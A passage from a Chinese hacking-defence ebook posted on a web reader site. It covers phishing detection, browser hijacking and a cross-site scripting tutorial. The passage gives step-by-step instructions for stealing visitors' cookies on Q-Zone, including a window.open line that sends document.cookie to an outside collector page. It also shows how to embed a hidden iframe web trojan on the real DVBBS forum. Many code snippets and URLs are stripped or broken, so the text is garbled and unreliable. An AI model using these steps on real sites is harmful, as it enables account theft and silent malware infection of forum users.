九味书屋 > 文学经管电子书 > 反黑风暴 >

第24部分

反黑风暴-第24部分

小说: 反黑风暴 字数: 每页4000字

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!




步骤11此时,即可在工具栏中显示craftToolbar工具条。当用户访问某个网站时,工具条中会显示此网站的信息。

当打开网站“//news。craft。”时,工具条中显示了该网站的信息,其中“Since”显示的是网站的建立时间,“Rand”中显示的是网站的世界排名。由于网站的建立时间都非常短,而且排名非常靠后,因此,通过时间和排名信息可判断网站的真伪。

7。6 专家课堂(常见问题与解答)

点拨1:如何使用TeleportPro工具的代理服务器(ProxyServer)下载文件?

解答:选择【File】→【Proxyserver】菜单项,即可打开【Proxyserver】对话框。选中最上边的连接复选框后,在“Address”文本框中输入代理器的IP地址,单击【OK】按钮,即可使用代理服务进行文件下载。通常使用局域网的用户要通过代理服务器才能进入Inter,利用TeleportPro下载文件必须使用此设置。

点拨2:除Hosts文件的映射劫持和内网中的DNS劫持外,还有哪些网站劫持钓鱼技术?

解答:除这两种劫持钓鱼技术外,还有“浏览器劫持”和“搜索引擎的SEO劫持钓鱼”。其中浏览器劫持是一种不同于普通病毒木马感染途径的网络攻击手段,它主要通过BHO、DLL插件、Hook技术等载体达到对用户的浏览器进行篡改的目的。

这些载体可以直接寄生于浏览器的模块里,成为浏览器的一部分,从而直接操纵浏览器的行为,并将用户带到钓鱼站点;而搜索引擎的劫持钓鱼是通过搜索引擎提高我们伪造站点的搜索排名,从而带来更多的流量,同时带来更多有针对性的被钓者。

第一章 常见XSS代码分析

要触发跨站脚本攻击,必须要先从了解HTML语言开始。在最初的XSS攻击中,攻击者就是通过闭合表单赋值所在的标记,形成完整无错的脚本标记,才触发XSS的。

在以后的发展中,XSS代码通过不断地改进来避开程序员的过滤,从而进行攻击。本节将介绍几种常见的XSS代码,并对其进行详细的分析。

8。1。1闭合“”

在HTML中,一个最常见的应用就是超级链接的代码:

好123网

假如在某个资料表单的提交内容中来进行上面语句的XSS,攻击者可以用下面的语句来闭合HTML标记,并构造出完整无错的脚本语句:》alert(‘XSS’);《

提交上面的代码闭合HTML代码后,会出现如下代码:

alert(‘XSS’);XSS测试

这就是一个简单的跨站脚本攻击。为了看到详细的跨站效果,我们可以直接在本地电脑中新建一个记事本文档,然后在其中输入上面的代码,并将其扩展名直接更改为html。双击该文件,直接运行后即可看到弹出的XSS提示。≮我们备用网址:≯

8。1。2属性中的“javascript:”

由于闭合表单赋值所在的标记,形成完整无错的脚本标记,即可触发XSS。如果没有脚本标记应怎样触发XSS呢?下面将介绍针对没有脚本标记的情况触发XSS的方法。

对于一些没有脚本标记的情况,攻击者需要使用其他标记进行闭合表单赋值所在的标记。比如,要在网页中显示一张图片,一般情况下会使用“”来定义,其具体的语句如下:



其中,“img”并不是真正地将图片加入到html文档里,而是通过“src”属性赋值。浏览器的任务是解释这个“img”,过程是访问“src”属性值中的URL地址,并为用户输出图片。但浏览器并不会主动检测这个“src”属性的相关值,这样,那些攻击者就有机可程了。

Javascript有一个URL伪协议,可以使用“javascript:”加上任意的javascript代码,当浏览器装载这样的URL时,便会执行其中的代码。这样,攻击者在某表单可以提交内容,并且没有过滤字符的情况下,就可以通过提交参数实现另一个跨站脚本攻击:



按照上一节中介绍的方法在记事本中输入上述代码并运行,页面中将会弹出一个提示框,提示框里面的内容就是上面代码中(‘测试’)语句的内容,即测试。

8。1。3事件类XSS代码

“img”有一个可以被XSS利用的onerror()事件,当“img”含有一个onerror()事件,而正好图片没有正常输出时,即可触发。且触发后可加入任意脚本代码,其中的代码也会被执行。代码的内容:

8。1。4编码后的XSS代码

从上面的几节内容中可以看出,攻击者要想进行XSS攻击,其实非常容易,这使许多网站都受到这种攻击。为了让攻击者无法构造XSS,一些程序员开始在脚本中过滤一些javascript的关键字符,如“&”和“”。但由于浏览器大多默认采用unicode编码,因此,这样的过滤并不能阻挡攻击者发起跨站脚本攻击。而在此基础上,HTML编码可以用“&#”+ASCII码的方式来提交,浏览器同样是认识且会执行的。

XSS转码只需要针对属性所赋予的值进行即可,如将下面的XSS代码:



经过“&#”+ASCII码的方式处理后,可变成如下的代码:



这是利用十进制转码后的代码,执行该代码后。

第二章 一个典型的跨站攻击实例

黑客进行XSS攻击的前提是需要先向Web页面中写入恶意HTML代码,写入代码的方法很多,比如最常见的是在论坛中发贴时,在帖子中写入可执行的代码;或者在网站的用户资料修改处,也可以通过更改签名、联系方式等,在用户信息页面中嵌入脚本代码。但无论采用哪种方式写入执行代码,都要求网页程序没有对用户输入的数据进行严格的过滤,否则就无法写入执行。

因此,造成跨站攻击的主要原因就是由于网站服务器端的程序,对客户的输入不进行有效验证,这样攻击者才有机会输入一些恶意的Script程序代码。

由于动态网站依赖于用户的输入,所以黑客可以通过把恶意脚本隐藏在合法请求中,将恶意脚本输入网页。一旦实现XSS攻击,黑客可以任意更改用户的设置、盗取账号、访问受限制的网站等操作。

XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:DVBBS的showerror。asp存在的跨站漏洞。另一类则是来自外部的攻击,主要指的是自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如果发现某个网站存在跨站漏洞,如Q…Zone个人空间名称跨站漏洞,黑客就可以通过编制一些窃取网页浏览用户的Cookie内容代码,来获取Cookie中的各种论坛和网站的账号和密码。

具体的操作步骤如下:

步骤01在网上申请一个网站空间,将准备好的kuazhan。asp文件上传到申请的空间中。kuazhan。asp文件的作用是收集Cookie内容,其具体内容如下。



步骤02下载并运行“Q…ZONE个人名称空间跨站漏洞利用工具”。

步骤03在文本框中输入相应的跨站代码。



Window。open(‘//192。168。0。45/kuazhan。asp?msg=’+document。cookie)



步骤04单击【提交】按钮,即可将该代码提交到黑客的Q…Zone页面上。只要其他QQ用户访问其Q…Zone时就会在当前网页中打开一个新窗口,连接到指定的收集Cookie的页面,并将自己的Cookie内容发送到网站空间中的“shouji。”文件中。

步骤05打开“shouji。”文件,即可看到用户的Cookie信息,而这些Cookie信息中可能就包含有各个用户的密码和账号。

这就是一个简单的跨站攻击的例子,攻击者之所以能够成功提交Script语句,而网站程序也把它作为正常的用户名执行程序,就是因为网页程序对用户输入的用户名过滤不严。

如果一个点击率和访问量很大的网站首页中被嵌入了网页木马,那将造成极其严重的后果,访问网站的每一个用户都有可能遭到木马的攻击。前面我们提到,DVBBS论坛的

showerror。asp页面存在一个严重的跨站漏洞,用户无须管理员权限,就可以在论坛页面中嵌入网页木马,攻击其他论坛用户。下面就以这个论坛为例,为大家介绍一个典型的黑客跨站入侵攻击实例。

1.在动网中嵌入一个网页

要实现跨站入侵攻击,需在DVBBS论坛网站中嵌入木马网页。具体的操作步骤如下:

步骤01在IE浏览器的地址栏中输入网址//bbs。dvbbs。/,即可打开动网官方论坛。

步骤02要登录该论坛,需要先在该论坛中注册一个用户。单击【注册】按钮,注册一个新用户即可;若已是注册用户,则单击【登录】按钮。

步骤03在用户名右侧选择【控制面板】→【联系资料修改】菜单项,即可打开个人资料修改页面。

步骤04在“论坛密码”文本框中输入论坛密码,在“主页地址”栏中输入代码“”。

【提示】

“主页地址”栏中输入的代码表示建立一个长度和宽度都为0的网页框架,在网页框架中会打开填写的网页木马地址。可以根据实际情况修改网页框架的长度和宽度及网页木马地址。

使用这种方式挂的网页木马,由于网页框架是隐藏的,因此别人根本无法发现。为了避免输入的网页木马地址对论坛造成危害,这里将输入一个普通的网址来代替网页木马地址,来演示一下挂马的效果。在“主页地址”栏中输入如下代码:



并输入Email地址,在“MSN号码”文本框中输入如下代码:

varactioninfo3='单帖屏蔽'。

步骤5:在设置完成后,单击【更新】按钮,即可提交修改资料内容。在提交成功后,则系统会弹出提示信息。

步骤06返回动网论坛中,在其中新发一个帖子,帖子的内容可以随意填写。发表成功后再查看新发的帖子,即可看到在新发的帖子页面中已经嵌入了一个网页框架,在框架中显示了“新起点工作室”的页面。

若是用隐藏的方法显示一个网页木马,则其他网页在查看该帖子时一定会中招被植入木马。如果将该网页框架长和宽都设置为0,则网页框架是隐藏的,任何浏览者都将会在无声无息中遭受到网页木马的攻击。

2.查找动网程序出现严重漏洞的原因

从上面的实例中可以看出,其实在动网论坛上挂上一个网页木马

返回目录 上一页 下一页 回到顶部 0 0

你可能喜欢的